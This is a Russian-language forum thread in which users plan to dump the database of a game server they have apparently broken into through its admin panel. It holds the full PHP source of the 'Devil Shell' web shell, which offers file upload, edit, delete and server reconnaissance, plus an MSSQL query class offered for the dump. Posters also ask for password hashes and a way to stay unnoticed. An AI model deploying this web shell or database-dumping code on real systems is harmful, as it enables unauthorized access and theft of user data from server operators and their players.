[Помогите!] Нужна помощь по админке PTS серва...

[Excellent18rus]

вообщем вместо мускула(MySql) - Mssql.

дк вот я с этим Mssql совсем не знаком... кто знаком хелп)

хочу шелл, через который можно будет приконнектится к Mssql и че-нибудь наделать :3 ... а то в wso такого нет...
и скриптик который бы мне базу слил и сразу метод хеширования подскажите

[J-Fobos]

Я так понял эту "дырку" уже 4 человека нашли

[Ссылки могут видеть только зарегистрированные пользователи. ]
1) создать подключение к базе
2) сделать дамп базы и сохранить в файл
3) закрыть подключение к базе

[Excellent18rus]

и если не сложно... во 1 как открыть коннект, во 2 через что коннектится ( к mysql знаю навикет, а тут хз , качал Microsoft Sql Server - че то он там проверку подлинности чтоли просит или что то такое вылазит)

думаю будет проще залить php админку, где все скрипты уже красивенько сделаны как меню тока где ее взять)

[J-Fobos]

Пхп скриптом открывать соединение (mssql_connect), этим же скриптом в файл сохранять и вообще делать все что надо

Пхп админка для mssql весит порядка 25 Мб, я думаю ее наличие будет заметным, да и заливаться будет долго.

Можно шелл с поддержкой mssql взять, например PHP Shell Devil

Код:

<?php
session_start();
ob_start();
error_reporting(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
?>
<title>Underground Devil:A Indian Hacker </title>
<body bgcolor="#0099cc" oncontextmenu="return false;">
<?php
    $pv=@phpversion();
    $self=$_SERVER["PHP_SELF"];
    $sm = @ini_get('safe_mode');
    
    if(isset($_GET['open']))
    {
        chdir($_GET['open']);
        $_SESSION['dir']=$_GET['open'];
    }
    else if(isset($_GET['create']))
    {
        chdir($_GET['create']);
        $_SESSION['dir']=$_GET['create'];
    }
        
 if(isset($_POST['dsub']))
    {
        header('location:'.$self."?open=".$_POST['ndir']);
    }
    
    function sept()
        {
            $sepr=explode('?',$self);
            echo $sepr[0];
        }
        

if(isset($_SESSION['a'])&& !isset($_GET['edit']))
{    
    function dis()
    {
        if(!ini_get('disable_functions'))
        {
            echo "None";
        }
        else
        {
            echo @ini_get('disable_functions');
        }
    }
    function logout()
    {
    session_destroy();
    header('location:'.$self);
    }
    function yip()
    {
        echo $_SERVER["REMOTE_ADDR"];
    }
    function sip()
    {
        echo getenv('SERVER_ADDR');
    }
    function cip()
    {
        echo $_SERVER["SERVER_NAME"];
    }
    function  safe()
    {
        echo($sm?"YES":"NO");
    }
    function browse()
    {
        $brow= $_SERVER["HTTP_USER_AGENT"];
        print($brow);
    }
    function split_dir()
    {
        $de=explode("/",getcwd());
        $del=$de[0];
        for($count=0;$count<sizeof($de);$count++)
        {
        $imp=$imp.$de[$count].'/';
            
        echo "<a href=".$self."?open=".$imp.">".$de[$count]."</a> / ";
        }
        
    }
    function mysql_ver() 
        {
            $output = shell_exec('mysql -V');
             preg_match('@[0-9]+\.[0-9]+\.[0-9]+@', $output, $ver);
             return $ver[0];
        }

    if(isset($_GET['delete']))
        {
            unlink($_GET['delete']);
            $redir=$_GET['delete'];
            header('location:'.$self.'?open='.$_SESSION['dir']);
        }
    function disk($this)
    {
        if($this=='2')
        $ds=disk_free_space(".");
    else
    $ds=disk_total_space(".");
    
     if($ds>=1073741824) 
         {
         $ds=number_format(($ds/1073741824),2)." gb";
         }
    else if($ds>=1048576)  
         {
         $ds=number_format(($ds/1048576),2)." mb";
         }
    else if($size >= 1024) 
         {
         $ds=number_format(($ds/1024),2)." kb";
         }
     else
        {
         $ds=$ds." byte";
        }

return $ds;
    }
        

    if($_GET['u']=='logout')
    {
        logout();
    }
    else if(isset($_POST['u']))
    {
        move_uploaded_file($_FILES['a']['tmp_name'],$_FILES['a']['name']);
    }

    $str="PGJsb2NrcXVvdGU+PHA+PHN0cm9uZz5EZXZpbCB2MS4wIEJldGEgUEhQIFNoZWxsPC9zdHJvbmc+PGJyPg0KICBEZXZpbCB2MS4wIEJldGE8c3Ryb25nPiBQSFA8L3N0cm9uZz4gU2hlbGwgaXMgYSBQSFAgU2NyaXB0IG1ha2UgZm9yIGNoZWNraW5nIHRoZSB2dWxuZXJhYmlsaXR5ICBhbmQgc2VjdXJpdHkgY2hlY2sgb2YgYW55IHdlYiBzZXJ2ZXIgb3Igd2Vic2l0ZS4gWW91IGNhbiBjaGVjayB5b3VyIFdlYnNpdGUgYW5kICCgcmVtb3RlIHdlYiBzZXJ2ZXIgU2VjdXJpdHkuIFRoaXMgc2hlbGwgIHByb3ZpZGUgeW91IG1vdmUgaW4gc2VydmVyIGRpcmVjdG9yeSAsdmlld2luZyBmaWxlcyBwcmVzZW50IGluIGRpcmVjdG9yeSAseW91ICBjYW6gIGRlbGV0ZSAsZWRpdCBhbmQgdXBsb2FkIHByb2ZpbGVzLiBNb3JlICBvdmVyIHlvdSBjYW4gY2hlY2s8YnI+DQogIFNlcnZlciBJUCAsWW91ciBJUCwgSG9zdGVkICZuYnNwO1BIUCBWZXJzaW9uICwmbmJzcDtTZXJ2ZXIgUG9ydCwmbmJzcDtTYWZlIG1vZGUgOiBZZXMvTm8sJm5ic3A7RGlzayBTcGFjZSwgZnJlZSBTcGFjZS4gQW5kIG1hbnkgb3RoZXIgYXR0cmFjdGl2ZSBmZWF0dXJlLiBUaGlzIGlzICBmaXJzdCB2ZXJzaW9uIHNvIHNvbWUgZnVuY3Rpb24gYXJlIGRpc2FibGUgbGlrZSBNeVNRTCBjb21tYW5kIGV4ZWN1dGlvbiAsTWFpbCAgQm9tYmluZyBldGMuIGJ1dCB3aWxsIHJlbGVhc2Ugc29vbiBpbiBuZXh0IHZlcnNpb24goKA8YnI+DQogIDxicj4NCiAgPHN0cm9uZz5MaW1pdGF0aW9uczwvc3Ryb25nPjxicj4NCiAgVGhlcmUgc29tZSBmdW5jdGlvbiB3aWxsIG5vdCB3b3JrIG9uIHdpbmRvdyBzZXJ2ZXIgLmFuZCBzb21lIGxpbmtzIGFyZSB1bmRlciBjb25zdHJ1Y3Rpb24uICB3aGljaCB3aWxsIGJlIGxhdW5jaCBhcyBlYXJseSBhcyBwb3NzaWJsZS48YnI+DQogIDxicj4NCiAgPHN0cm9uZz5BYm91dCBDb2Rlcjo8L3N0cm9uZz48YnI+DQogIFNjcmlwdCBpcyBjcmVhdGVkIGJ5IFVuZGVyZ3JvdW5kIERldmlsIGEgSW5kaWFuIEV0aGljYWwgIGhhY2tlciBXaXRoIHRoZSBoZWxwIG9mIFRlYW0gTlVUUyBhbmQgTXkgZnJpZW5kcyAud2hvIGdhdmUgbWUgaWRlYSBhbmQgIGVuY291cmFnZSB0byBtYWtlIHRoaXMuIFlvdSBjYW4gZG93bmxvYWSgICB0aGlzIHNjcmlwdCBmcm9tIGhhY2tudXRzLmNvbaAgIC50aGlzIGlzIHJlbGVhc2UgdW5kZXIgR05VIEdFTkVSQUwgUFVCTElDIExJQ0VOU0UgPC9wPg0KPHAgYWxpZ249anVzdGlmeT48c3Ryb25nPkRlY2xhcmF0aW9uIDo8L3N0cm9uZz48YnI+DQogIFRoaXMgc2NyaXB0IG9ubHkgZm9yIGVkdWNhdGlvbiBwdXJwb3NlIGRvbpJ0IG1pc3MgdXNlIGl0ICBvdGhlcndpc2UgdGhlIHNjcmlwdCBtYWtlciBpcyBub3SgIHRha2UgIGFueSByZXNwb25zaWJpbGl0eSBmb3IgYW55IGRhbWFnZSBvciBoYXJtIG9yIGFjY291bnQgc3VzcGVuZGVkPC9wPg0KPGRpdiBhbGlnbj1qdXN0aWZ5Pg0KDQo8L2Rpdj4NCjxwIGFsaWduPWp1c3RpZnk+PHN0cm9uZz5JbnN0YWxsYXRpb246PGJyPg0KICA8L3N0cm9uZz5TaW1wbGUgaW5zdGFsbGF0aW9uIGp1c3QgcGVuZXRyYXRlIHRoZSBmaWxlIHVzaW5nIEZUUCBvciBodG1sIFVwbG9hZGVyIG9uICBzZXJ2ZXIgYW5kIGNoZWNrIHRoZSBzaXRlIHZ1bG5lcmFiaWxpdHkuIDxicj4NCiAgPGJyPg0KICBUaGlzIGlzIHBhc3N3b3JkIHByb3RlY3RlZCBzaGVsbCBzbyB5b3UgY2FuIHNlbmQgZW1haWwgdG8gIGdldCB1c2VybmFtZSBvciBwYXNzd29yZDxicj4NCiAgQXQgPGEgaHJlZj0nbWFpbHRvOnVnZGV2aWxAZ21haWwuY29tJz51Z2RldmlsQGdtYWlsLmNvbTwvYT48YnI+DQogIDxicj4NCiAgPHN0cm9uZz5TdWdnZXN0aW9uL0J1ZyBSZXBvcnQ6PC9zdHJvbmc+PGJyPg0KICBUaGlzIGlzIG15IGZpcnN0IHZlcnNpb24gc28gbWF5IGJlIHRoZXJlIHdvdWxkIGJlIHNvbWUgYnVncyAgcHJlc2VudCBzbyBkb26SdCBoZXNpdGF0ZSBtZSB0byBpbmZvcm0gbWUgYXQgPGEgaHJlZj0nbWFpbHRvOnVnZGV2aWxAZ21haWwuY29tJz51Z2RldmlsQGdtYWlsLmNvbTwvYT4gb3IgaWYgeW91IHdhbnQgdG8gZ2lyZSBhbnkgc3VnZ2VzdGlvbiBkb26SdCBoZXNpdGF0ZSB0byBtYWlsIG1lIEogPGJyPg0KICA8YnI+DQogIDxicj4NCiAgPHN0cm9uZz5Eb3dubG9hZDwvc3Ryb25nPjxicj4NCiAgWW91IGNhbiBkb3dubG9hZCBzaGVsbCBhdCBoYWNrbnV0cy5jb20gYW5kIGFsc28gdmlzaXQgIDxzdHJvbmc+aGFja251dHMuY29tPC9zdHJvbmc+IGZvciBsYXRlc3QgdmVyc2lvbi5vciB5b3UgY2FuIG1haWwgbWUgZm9yIHRoaXMgc2NyaXB0IGF0ICB1Z2RldmlsQGdtYWlsLmNvbTxicj4NCjwvcD4=";


    
?>

<table width=100%><tr><td bgcolor="#000000"><font color=white face="Monotype Corsiva" size=7>Devil Shell</font> <font color=#0099cc>V1.0 Beta</font></td>
</tr>
<tr><td bgcolor="#000000"><a href=<?php echo $self."?open="; ?>>Shell</a> | <a href=<?php echo $self."?create=".$_SESSION['dir']?>>Create File</a> | <a href>Run MySQL</a> | 
<a href=<?php echo $self."?moreinfo"; ?>>More Information</a> |
<a href=<?php echo $self."?mail"; ?>>Mail Bomber</a> |
<a href=<?php echo $self."?phpinfo"; ?>>PHP Info</a> |
<a href=<?php echo $self;?>?warning>Declaration</a> |
<a href=<?php echo $self;?>?u=logout>Logout</a></td>
</tr>
<tr><td bgcolor="#000000"><span class=hd>Server IP :</span><span class=head> <?php cip(); ?></span>
&nbsp;&nbsp;&nbsp;&nbsp;<span class=hd>Your IP :</span><span class=head> <?php yip(); ?></span>
&nbsp;&nbsp;&nbsp;&nbsp;<span class=hd>PHP Version :</span> <span class=head><?php echo $pv; ?></span>

&nbsp;&nbsp;<span class=hd>Server Port :</span> <span class=head><?php echo $_SERVER['SERVER_PORT'];?></span>
&nbsp;&nbsp;&nbsp;&nbsp;<span class=hd>Safe Mode :</span> <span class=head><?php safe();?></span>
&nbsp;&nbsp;&nbsp;&nbsp;<span class=hd>Disk Space :</span> <span class=head><?php echo disk(1);?></span>
&nbsp;&nbsp;&nbsp;&nbsp;<span class=hd>free Space :</span> <span class=head><?php echo disk(2);?></span>
<br><br>
<span class=hd>Your System info :</span> <span class=head><?php echo php_uname(); ?></span><br>

<br>
<span class=hd>Directory : </span> <span class=head><?php echo split_dir();?></span>
</td></tr>
<tr><td bgcolor="#0099cc">
<table  width=100% class=tab>

<?php
    if(isset($_GET['create']))
    {
        if(isset($_SESSION['a']))
        {
            echo "<form action=$self?edit=".$_SESSION['a']." method=post>";
        }
        else
        {
            echo "<form action=$self?eddit= method=post>";

        }

    ?>
    <center>
    <table>
    <tr><td><span class=head>File Name </span> </td><td><input type=text name=fn size=70></td></tr>
    <tr><td colspan=2><span class=head>File content</td></tr>
    <tr><th colspan=2><center><textarea rows=15 cols=70 name=fc></textarea></th></tr>
<tr><th colspan=2><input type=submit value="Create File">
    </th></tr></table>
    </form>
    <?php
    }
    else if(isset($_GET['warning']))
    {
    
        echo base64_decode($str);

    }
else if(isset($_GET['phpinfo']))
{
    echo "<center>".phpinfo();
}
else if(isset($_GET['moreinfo']))
    {
    ?>
    <center>
<table width=90%>
<tr><th colspan=2> Brief Information </th></tr>
<tr><td class=head><b>Server Name : </td><td></td></tr>
<tr><td class=head><b>Server IP : </td><td> <?php cip(); ?> </td></tr>
<tr><td class=head><b>Server PORT : </td><td><?php echo $_SERVER['SERVER_PORT'];?></td></tr>
<tr><td class=head><b>Your IP : </td><td><?php yip(); ?></td></tr>
<tr><td class=head><b>PHP VERSION : </td><td><?php echo $pv; ?></td></tr>
<tr><td class=head><b>Curl</td><td><?php echo function_exists('curl_version')?("<b>Enable"):("Disable"); ?></td></tr>
<tr><td class=head><b>Oracle : </td><td><?php echo function_exists('ocilogon')?("<b>Enable"):("Disable"); ?></td></tr>
<tr><td class=head><b>MySQL : </td><td><?php  echo function_exists('mysql_connect')?("<b>Enable"):("Disable");?></td></tr>
<tr><td class=head><b>MSSQL :</td><td><?php echo function_exists('mssql_connect')?("<b>Enable"):("Disable"); ?></td></tr>
<tr><td class=head><b>PostgreSQL :</td><td><?php echo function_exists('pg_connect')?("<b>Enable"):("Disable"); ?></td></tr>
<tr><td class=head><b>Disable functions :</td><td><?php dis(); ?></td></tr>
<tr><td class=head><b>Total Disk Space : </td><td><?php echo disk(1);?></td></tr>
<tr><td class=head><b>Free Space : </td><td><?php echod disk(2);?></td></tr>
<tr><td class=head><b>OS</td><td><?php echo php_uname(); ?></td></tr>
<tr><td class=head><b>OS</td><td></td></tr>
</table>
    <?php
    }

    else if(isset($_GET['rename']))
    {
        echo "<form action=# method=post>New File name <input type=text name=rf><br><input type=submit value='Rename File' name=srf></form>";
        if(isset($_POST['srf']))
        {
            rename($_GET['rename'],$_POST['rf']);
            header('location:'.$self."?open=".$_SESSION['dir']);
        }
    }
else if($handle = opendir('./'))
 {
  while (false !== ($file = readdir($handle))) 
  {
  if(is_dir($file))
     {
    $directories[] = $file;
     }
     else
     {
    $files[] = $file;
     }
  }
 asort($directories);
 asort($files);
 $kb=filesize($fdile)/1024;
 
foreach($directories as $file)
  { if($bg%2==0)
       echo "<tr bgcolor=#0099cc>";
       else
           echo "<tr bgcolor=#00cccc>";
        $kb=number_format(filesize($file)/1024,2);
      echo "
 <td valign=top><a href=".$self."?open=".realpath('.')."/".$file."><span class=li>".$file."</span> </a></td><td> &nbsp;&nbsp;&nbsp;&nbsp;...<td valign=top>".date ("m/d/Y | H:i:s", filemtime($file))."</td><td><a href=".$self."?open=".realpath('.')."/".$file."><span class=li>Opean</span></a> | <a href=".$self."?delete=".realpath('.')."/".$file."><span class=li>Delete</span></a> </td></tr>";
   $bg++;
  }

  foreach($files as $file)
  {
       if($bg%2==0)
       echo "<tr bgcolor=#0099cc>";
       else
           echo "<tr bgcolor=#00cccc>";
        $kb=number_format(filesize($file)/1024,2);
      echo "
  <td valign=top><a href=".$self."?edit=".realpath('')."><span class=li>".$file."</span> </a></td><td> &nbsp;&nbsp;&nbsp;&nbsp;".$kb."kb<td valign=top>".date ("m/d/Y | H:i:s", filemtime($file))."</td><td><a href=".$self."?edit=".realpath('.')."/".$file."><span class=li>View</span></a> | <a href=".$self."?rename=".realpath('.')."/".$file."><span class=li>Rename</span></a>|<a href=".$self."?delete=".realpath('.')."/".$file."><span class=li>Delete</span></a> </td></tr> ";
   $bg++;
   }


 ?>

</table>
</td>
</tr>
<tr height=30><td bgcolor="#000000" ><table><form action=# method=post enctype=multipart/form-data><tr><td><span class=hd>Upload file : </td><td><input type=file name=a size=100><input type=submit value=Upload name=u></span></td></tr></form>
<form action=<?php echo $self;?> method=post>
<tr><td>
<span class=hd>Go : </td><td><input type=text name=ndir Value=<?php echo realpath(''); ?> size=100>&nbsp;&nbsp;&nbsp;<input type=submit value=go name=dsub></span></td></tr>
</form>
</table>
</td>
</tr>



<?php
}

echo "<tr height=25><th bgcolor=#000000><p class=head><font color=#0099cc>Credit : Underground Devil &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Email: [Ссылки могут видеть только зарегистрированные пользователи. ]</th></tr>
</table>";
}

else if(isset($_GET['edit'])&&isset($_SESSION['a']))
{
    if(isset($_POST['fn'])&& !empty($_POST['fc']))
    {
    
        if(empty($_SESSION['dir']))
        {
        $fo=fopen($_POST['fn'],"a");
        }
        else
        {
            $fo=fopen($_SESSION['dir']."/".$_POST['fn'],"a");
        }

        fwrite($fo,$_POST['fc']);
        fclose($fo);
        header('location:'.$self."?open=".$_SESSION['dir']);

    }
    else if(isset($_POST['fdata'])&&!empty($_POST['fdata']))
    {
        $b_dir=$_GET['edit'];
        $exp=explode("/",$b_dir);
        for($i=0;$i<sizeof($exp);$i++)
        {
            $txt=$exp[$i];
        }
        echo "File name is : ".$txt."<br>";
        $fd=fopen($_GET['edit'],'w');
        fwrite($fd,$_POST['fdata']);
        fclose($fd);
        header('location:'.$self."?open=".$_SESSION['dir']);
    }
    else
    {
    
?>

<table width=100%><tr bgcolor=#000000><td><font color=#ffffff>File Name:<?php echo $_GET['edit']; ?> [<a href=<?php sept(); ?>>Main Page</a>]</font>
<form action=# method=post><tr bgcolor=#0099cc><td><center>
<textarea rows=30 cols=100 name=fdata>
<?php
    $fedit=$_GET['edit'];
$frd=@fopen($fedit,"r");
while(!feof($frd))
    {
    echo fgets($frd);
    }
    
?>
</textarea>

<hr color=#000000>
<input type=submit value="&nbsp;&nbsp;&nbsp;Edit File&nbsp;&nbsp;&nbsp;" name=fdat>

<hr color=#000000>
</form>
</td></tr>

</td></tr>

</table>
<?php
}
}
else
{
$cuser=md5($_POST['uname']);
$puser=md5($_POST['pass']);
?>
    <br><br><br><br><center><table width=30% >
<tr><td bgcolor="#000000"><p class="head">you need to login for use Shell</p></td>
</tr>
<form action=# method=post>
<tr><td bgcolor="#0099cc" height=100>Username &nbsp;&nbsp;<Input type=text name=uname>
<br>
Password &nbsp;&nbsp;&nbsp;&nbsp;<input type=password name=pass>
<br>
<input type=submit value=submit>
</td>
</form>
</tr>
<tr><td bgcolor="#000000"></td>
</tr>

</table>

<?php 
    $user='20e0c268da73941f650bff276e39150e';
$pass='fcea920f7412b5da7be0cf42b8c93759';

    if($cuser==$user && $puser==$pass)
    {$_SESSION['a']=$_POST['uname'];
header('location:'.$self);}} ?>
<style>
a {color:#fff;outline:none;text-decoration:none;}
a:hover{text-decoration:none;}
.head {
    color: #FFFFFF;
    font-weight: bold;
}
.tab
{
    border-color:#0099cc;
    border:double;
}
.hd
{
    color:#0099cc;
    border-color:#000000;
    border:double;
}
.li{
    color: #000066;
    font-weight: bold;
    text-decoration:none;
}
</style>

Но мне больше вариант с мелким скриптом нравится, быстро, удобно и не заметно. Нарисуете мне вещичек, если поиграть захочу?



и мне)) //Jumper xD

[Excellent18rus]

ну если все получится и получится как-то не заметно то почему бы нет

шелл выше тока mysql

[J-Fobos]

Странно, в версии 0.8 я юзал mssql, но в этой не смог найти такого функционала.
Вот такое можете рискнуть попробовать [Ссылки могут видеть только зарегистрированные пользователи. ]

Вот накатал скрипт, думаю доделать сумеете С вас пиво))

Цитата: <?php class CSql { var $result; var $dbc; var $qr_cnt; var $count; function connect_db($server, $database, $user, $password) { $this->dbc=mssql_connect($server, $user, $password); if(!$this->dbc) return false; $result=@mssql_select_db($database); if(!$result) return false; return true; } //Выполняем запрос function query($query_str) { $qr_cnt++; $this->result=@mssql_query($query_str); $this->count=@mssql_num_rows($this->result); if(!$this->result) return false; return true; } function close_db() { if($this->dbc && $this->qr_cnt>0) mssql_close($this->dbc); } //Замена потенциально опасных символов function replace(&$txt, $len) { //if($len>0) $txt=addslashes(substr($txt,0,$len)); //else $txt=addslashes($txt); if($len>0) $txt=str_replace("'","\"", substr($txt,0,$len)); else $txt=str_replace("'","\"", $txt); } function GetLastID($name) { $this->query("SELECT IDENT_CURRENT('".$name."')"); $row_id=mssql_fetch_array($this->result); return $row_id[0]; } function fetch($res) { return mssql_fetch_array($res); } } ?>

[Helko]

я вам нарисую) меня кто спросил? взломал то вообще я)